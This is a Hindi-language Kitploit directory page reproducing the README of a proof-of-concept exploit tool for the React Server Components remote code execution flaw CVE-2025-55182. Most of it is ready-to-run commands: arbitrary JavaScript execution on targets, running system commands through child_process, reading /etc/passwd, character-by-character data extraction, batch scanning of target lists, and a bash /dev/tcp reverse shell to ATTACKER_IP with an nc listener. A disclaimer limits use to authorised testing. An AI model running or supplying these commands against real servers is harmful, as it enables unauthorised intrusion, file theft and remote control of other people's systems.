Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
उपकरण/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

React Server Components (RSC) के लिए रिमोट कोड एक्ज़ीक्यूशन स्कैनर

CVE Python


क्रेडिट्स

भूमिकानामलिंक
मूल शोधLachlan Davidsongithub.com/lachlan2k

मूल PoC पर आधारित: React2Shell-CVE-2025-55182-original-poc


अवलोकन

React2Shell CVE-2025-55182 के लिए एक व्यापक सुरक्षा स्कैनर है, जो React Server Components (RSC) इम्प्लीमेंटेशन को प्रभावित करने वाली एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। यह भेद्यता अनऑथेंटिकेटेड हमलावरों को React Flight प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से सर्वर पर मनमाना JavaScript कोड निष्पादित करने की अनुमति देती है।

मुख्य विशेषताएँ

  • मल्टी-वेरिएंट टेस्टिंग: मूल शोध से 4 अलग-अलग पेलोड संरचनाओं का परीक्षण करता है
  • वर्जन डिटेक्शन: भेद्य React और फ्रेमवर्क वर्जन की पहचान करें
  • RCE सत्यापन: डाइजेस्ट विविधता, टाइमिंग और OOB कॉलबैक के माध्यम से कोड निष्पादन की पुष्टि करें
  • OOB टेस्टिंग: Burp Collaborator और Interactsh के लिए समर्थन
  • कस्टम पेलोड: भेद्य सर्वरों पर मनमाना JavaScript निष्पादित करें
  • डेटा एक्सट्रैक्शन: कैरेक्टर-दर-कैरेक्टर डेटा एक्सफिल्ट्रेशन
  • प्रोफेशनल आउटपुट: साक्ष्य संग्रह के साथ स्वच्छ, रंगीन टर्मिनल आउटपुट

इंस्टॉलेशन

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# डिपेंडेंसी इंस्टॉल करें
pip install requests

# स्कैनर चलाएँ
python3 exploit_cve_2025_55182_v2.py -h

उपयोग

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

स्कैन मोड

1. वर्जन मोड (डिफ़ॉल्ट)

भेद्य React और फ्रेमवर्क वर्जन का निष्क्रिय रूप से पता लगाता है:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. सत्यापन मोड (-m verify)

कई तकनीकों और सभी 4 पेलोड वेरिएंट का उपयोग करके RCE की सक्रिय रूप से पुष्टि करता है:

root@kitploit:~
# बुनियादी सत्यापन (डाइजेस्ट विविधता)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# समय-आधारित सत्यापन के साथ
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# OOB कॉलबैक के साथ (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# विस्तृत आउटपुट के साथ पूर्ण सत्यापन
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. कस्टम मोड (-m custom)

मनमाना JavaScript पेलोड निष्पादित करें:

root@kitploit:~
# Node.js वर्जन प्राप्त करें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# सिस्टम कमांड निष्पादित करें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# फ़ाइल पढ़ें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. बैच स्कैन (-f)

किसी फ़ाइल से कई URL स्कैन करें और केवल भेद्य लक्ष्य दिखाएं:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

उदाहरण

बुनियादी स्कैन

root@kitploit:~
# वर्जन डिटेक्शन (डिफ़ॉल्ट मोड)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE सत्यापन
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# कई लक्ष्यों का बैच स्कैन
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# विस्तृत आउटपुट
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

उन्नत उपयोग

root@kitploit:~
# समय-आधारित + OOB सत्यापन
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# सर्वर जानकारी निकालें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# कमांड निष्पादित करें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

रिवर्स शेल

root@kitploit:~
# लिसनर प्रारंभ करें
nc -lvnp 443

# रिवर्स शेल निष्पादित करें
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन सिस्टमों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है
  • लेखक इस टूल के दुरुपयोग के लिए ज़िम्मेदार नहीं हैं
  • हमेशा ज़िम्मेदार प्रकटीकरण प्रथाओं का पालन करें

संदर्भ

  • CVE-2025-55182 - NVD
  • Lachlan Davidson द्वारा मूल PoC
  • React सुरक्षा सलाह
  • Next.js सुरक्षा सलाह
  • React Server Components दस्तावेज़ीकरण
टूल डाउनलोड करें
आर्गुमेंटविवरण
-t, --targetलक्ष्य URL (जैसे, https://example.com)
-f, --fileबैच स्कैनिंग के लिए URL की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-m, --modeस्कैन मोड: version (डिफ़ॉल्ट), verify, या custom
--jsकस्टम मोड के लिए JavaScript कोड
--extractस्ट्रिंग परिणाम को कैरेक्टर-दर-कैरेक्टर निकालें
--sleep SECONDSसमय-आधारित RCE सत्यापन (verify मोड)
--callback URLOOB टेस्टिंग के लिए HTTP कॉलबैक URL (verify मोड)
--dns DOMAINOOB टेस्टिंग के लिए DNS कॉलबैक डोमेन (verify मोड)
-v, --verboseपेलोड विवरण के साथ विस्तृत आउटपुट
--no-colorरंगीन आउटपुट अक्षम करें
--timeout SECONDSHTTP अनुरोध टाइमआउट (डिफ़ॉल्ट: 30)